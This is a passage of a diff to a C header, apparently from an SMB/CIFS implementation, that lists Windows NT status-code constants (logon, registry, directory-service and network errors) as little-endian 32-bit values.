+-#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
+-#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
+-#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
+-#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
+-#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
+-#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
+-#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
+-#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
+-#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
+-#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
+-#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
+-#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
+-#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
+-#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
+-#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
+-#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
+-#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
+-#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
+-#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
+-#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
+-#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
+-#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
+-#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
+-#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
+-#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
+-#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
+-#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
+-#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
+-#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
+-#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
+-#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
+-#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
+-#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
+-#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
+-#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
+-#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
+-#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
+-#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
+-#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
+-#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
+-#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
+-#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
+-#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
+-#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
+-#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
+-#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
+-#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
+-#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
+-#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
+-#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
+-#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
+-#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
+-#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
+-#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
+-#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
+-#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
+-#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
+-#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
+-#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
+-#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
+-#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
+-#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
+-#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
+-#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
+-#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
+-#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
+-#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
+-#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
+-#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
+-#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
+-#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
+-#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
+-#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
+-#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
+-#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
+-#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
+-#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
+-#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
+-#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
+-#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
+-#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
+-#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
+-#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
+-#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
+-#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
+-#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
+-#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
+-#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
+-#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
+-#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
+-#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
+-#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
+-#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
+-#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
+-#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
+-#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
+-#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
+-#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
+-#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
+-#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
+-#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
+-#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
+-#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
+-#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
+-#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
+-#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
+-#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
+-#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
+-#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
+-#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
+-#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
+-#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
+-#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
+-#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
+-#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
+-#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
+-#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
+-#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
+-#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
+-#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
+-#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
+-#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
+-#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
+-#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
+-#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
+-#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
+-#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
+-#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
+-#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
+-#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
+-#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
+-#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
+-#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
+-#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
+-#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
+-#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
+-#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
+-#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
+-#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
+-#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
+-#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
+-#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
+-#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
+-#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
+-#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
+-#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
+-#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
+-#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
+-#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
+-#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
+-#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
+-#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
+-#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
+-#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
+-#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
+-#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
+-#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
+-#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
+-#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
+-#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
+-#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
+-#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
+-#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
+-#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
+-#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
+-#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
+-#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
+-#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
+-#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
+-#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
+-#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
+-#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
+-#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
+-#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
+-#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
+-#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
+-#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
+-#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
+-#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
+-#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
+-#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
+-#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
+-#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
+-#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
+-#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
+-#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
+-#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
+-#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
+-#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
+-#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
+-#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
+-#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
+-#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
+-#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
+-#define STATUS_RETRY cpu_to_le32(0xC000022D)
+-#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
+-#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
+-#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
+-#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
+-#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
+-#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
+-#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
+-#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
+-#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
+-#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
+-#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
+-#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
+-#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
+-#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
+-#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
+-#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
+-#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
+-#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
+-#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
+-#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
+-#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
+-#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
+-#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
+-#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
+-#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
+-#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
+-#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
+-#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
+-#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
+-#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
+-#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
+-#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
+-#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
+-#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
+-#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
+-#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
+-#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
+-#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
+-#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
+-#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
+-#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
+-#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
+-#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
+-#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
+-#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
+-#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
+-#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
+-#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
+-#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
+-#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
+-#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
+-#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
+-#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
+-#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
+-#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
+-#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
+-#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
+-#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
+-#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
+-#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
+-#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
+-#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
+-#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
+-#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
+-#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
+-#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
+-#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
+-#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
+-#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
+-#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
+-#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
+-#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
+-#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
+-#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
+-#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
+-#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
+-#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
+-#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
+-#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
+-#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
+-#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
+-#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
+-#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
+-#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
+-#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
+-#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
+-#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
+-#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
+-#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
+-#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
+-#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
+-#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
+-#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
+-#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
+-#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
+-#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
+-#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
+-#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
+-#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
+-#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
+-#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
+-#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
+-#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
+-#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
+-#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
+-#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
+-#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
+-#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
+-#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
+-#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
+-#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
+-#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
+-#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
+-#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
+-#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
+-#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
+-#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
+-#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
+-#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
+-#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
+-#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
+-#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
+-#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
+-#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
+-#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
+-#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
+-#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
+-#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
+-#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
+-#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
+-#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
+-#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
+-#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
+-#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
+-#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
+-#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
+-#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
+-#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
+-#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
+-#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
+-#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
+-#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
+-#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
+-#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
+-#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
+-#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
+-#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
+-#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER cpu_to_le32(0xC00002DB)
+-#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
+-#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
+-#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
+-#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
+-#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
+-#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
+-#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
+-#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
+-#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
+-#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
+-#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
